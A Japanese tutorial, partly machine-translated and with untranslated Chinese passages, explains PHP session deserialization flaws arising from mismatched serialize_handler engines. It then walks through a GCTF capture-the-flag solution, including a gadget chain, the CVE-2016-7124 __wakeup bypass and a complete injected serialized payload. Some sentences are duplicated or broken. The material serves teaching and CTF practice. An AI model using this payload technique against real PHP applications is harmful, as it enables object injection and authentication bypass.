この記事では主に PHP の session デシリアライゼーションの脆弱性について紹介します。必要な方は参考にしてください。
php.ini には 3 つの設定項目があります:
上記のオプションは同じです。セッション ストレージとシーケンス ストレージに関連する PHP オプション。
xampp コンポーネントを使用したインストールでは、上記の設定項目は次のように設定されます:
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下 session.save_handler=files 表明session是以文件的方式来进行存储的 session.auto_start=0 表明默认不启动session session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
上記の設定では、デフォルトの PHP に加えて、セッションのシリアル化エンジンを設定するために session.serialize_handler が使用されます。エンジンには他にもエンジンがあり、エンジンごとに対応するセッションの保存方法が異なります。
php_binary: 格納方法は、キー名の長さに相当するASCII文字+キー名+serialize()関数でシリアル化された値
php: 格納方法は、キー名+縦棒+ Serialize() 関数 シリアル化された値
php_serialize(php>5.5.4): 保存方法は、serialize() 関数によってシリアル化された値です
必要に応じて、PHP でのデフォルトの使用は PHP エンジンです。他のエンジンに変更するには、コード ini_set('session.serialize_handler', '設定する必要があるエンジン'); を追加するだけです。サンプルコードは次のとおりです。
session ディレクトリは /var/lib/php/sessions にあります
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump($_SESSION);
php_serialize エンジンの下で、セッション ファイルに保存されるデータは次のとおりです。
a:1:{s:4:"name";s:6:"spoock";}
php ファイルエンジンの下のコンテンツは:
name|s:6:"spoock";
php_binary エンジンの下のファイルのコンテンツは:
names:6:"spoock";
名前の長さは 4 なので、4 は ASCII テーブルの EOT に対応します。 php_binary の格納規則によると、最後のものは names:6:"spoock"; です。 (突然ですが、ASCII値が4の文字はWebページ上で表示できないことが分かりました。ASCIIテーブルをご自身で確認してください)
PHPセッションにおけるシリアライズハザード
セッションの実装には問題ありませんPHP の場合、害は主にプログラマーによるセッションの不適切な使用によって引き起こされます。
保存された $_SESSION データを逆シリアル化するために PHP が使用するエンジンが、シリアル化に使用されるエンジンと異なる場合、データは正しく逆シリアル化されません。慎重に構築されたデータ パケットにより、プログラム検証をバイパスしたり、一部のシステム メソッドを実行したりすることが可能です。例:
$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
のようなphpファイル:
ログイン後にコピー
にアクセスすると、セッションファイルの内容は次のようになります:
root/var/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6 a:1:{s:4:"ryat";s:30:"|O:1:"A":1:{s:1:"a";s:2:"xx";}
ただし、この時点では、シミュレーションでは異なるphpエンジンが使用されます。他のページで読み込むため 内容は次のとおりです: (デフォルトでは、セッション ファイルの読み取りに php エンジンが使用されます)
a; } } // var_dump($_SESSION);
このページにアクセスして、xx
xxarray(1) { ["a:1:{s:4:"ryat";s:30:""]=> object(A)#1 (1) { ["a"]=> string(2) "xx" } }
を出力するPHP エンジンでは | がキーと値の区切り文字として使用され、a:1:{s:4:"ryat";s:30:" が SESSION キーとして使用され、O:1:" A":1:{s:1:" a";s:2:"xx";} を値として使用し、逆シリアル化すると、最終的にクラス A が得られます。
これは、使用されているさまざまなエンジンが原因です。シリアル化と逆シリアル化 PHP セッションのシリアル化の脆弱性の原因。PHP エンジンを使用してページを読み込むときに、セッションがセッション内のコンテンツを読み取り、それを逆シリアル化するため、出力が行われずに脆弱性が引き起こされます。 GCTF の脆弱性分析:
index.php には以下が含まれます:
<?php //error_reporting(E_ERROR & ~E_NOTICE); ini_set('session.serialize_handler', 'php_serialize'); header("content-type;text/html;charset=utf-8"); session_start(); if(isset($_GET['src'])){ $_SESSION['src'] = $_GET['src']; highlight_file(FILE); print_r($_SESSION['src']); } ?> <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>代码审计2</title> </head> <body>
<form action="./query.php" method="POST"> <input type="text" name="ticket" /> <input type="submit" /> </form> <a href="./?src=1">查看源码</a> </body> </html>
/************************/ /* //query.php 部分代码 session_start(); header('Look me: edit by vim ~0~') //...... class TOPA{ public $token; public $ticket; public $username; public $password; function login(){ //if($this->username == $USERNAME && $this->password == $PASSWORD){ //抱歉 $this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){ return 'key is:{'.$this->token.'}'; } } } class TOPB{ public $obj; public $attr; function construct(){ $this->attr = null; $this->obj = null; } function toString(){ $this->obj = unserialize($this->attr); $this->obj->token = $FLAG; if($this->obj->token === $this->obj->ticket){ return (string)$this->obj; } } } class TOPC{ public $obj; public $attr; function wakeup(){ $this->attr = null; $this->obj = null; } function destruct(){ echo $this->attr; } } */
アイデアは次のとおりです:
この質問では、TOPC を構築し、破棄中に が呼び出されます。 echo $this->attr;
;
echo $this->attr;
;
将attr赋值为TOPB对象,在echo TOPB的时候会自动调用tostring魔术方法
在tostring中会调用unserialize($this->attr)
,因为后面用到token和ticket,所以显然时TOPA对象。后面判断需要$this->obj->token === $this->obj->ticket
,所以在序列化的时候进行指针引用使$a->ticket = &$a->token;
,即可绕过判断。
至于为什么(string)$this->obj
unserialize($this->attr)
を呼び出します。トークンとチケットは後で使用されるため、明らかに TOPA オブジェクトです。後の判定には $this->obj->token === $this->obj->ticket
が必要なので、$a になるようにシリアル化中にポインタ参照が行われます。 - >ticket = &$a->token;
の場合、判定を回避できますなぜ (string)$this->obj
がフラグを出力するのかというと、 Login はバックグラウンドで書き込まれます。
デシリアライズされた
には、内部のパラメーターをクリアするための wakeup() 関数があり、CVE: CVE-2016-7124 を介してバイパスできるかどうかを尋ねました。ウェイクアップ機能は、オブジェクト内の数量を表すフィールドを実際のフィールドよりも大きな値に変更することでバイパスできます。
最終的なコードは:
$testa = new TOPA(); $testc = new TOPC(); $testb = new TOPB(); $testa->username = 0; $testa->password = 0; $testa->ticket = &$testa->token; $sa = serialize($testa); $testc->attr = $testb; $testb->attr = $sa; $test = serialize($testc); echo $test;
|O:4:"TOPC":3:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";N;s:4:"attr";s:84:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";i:0;s:8:"password";i:0;}";}}
以上がPHP のセッション逆シリアル化の脆弱性に関する簡単な説明の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。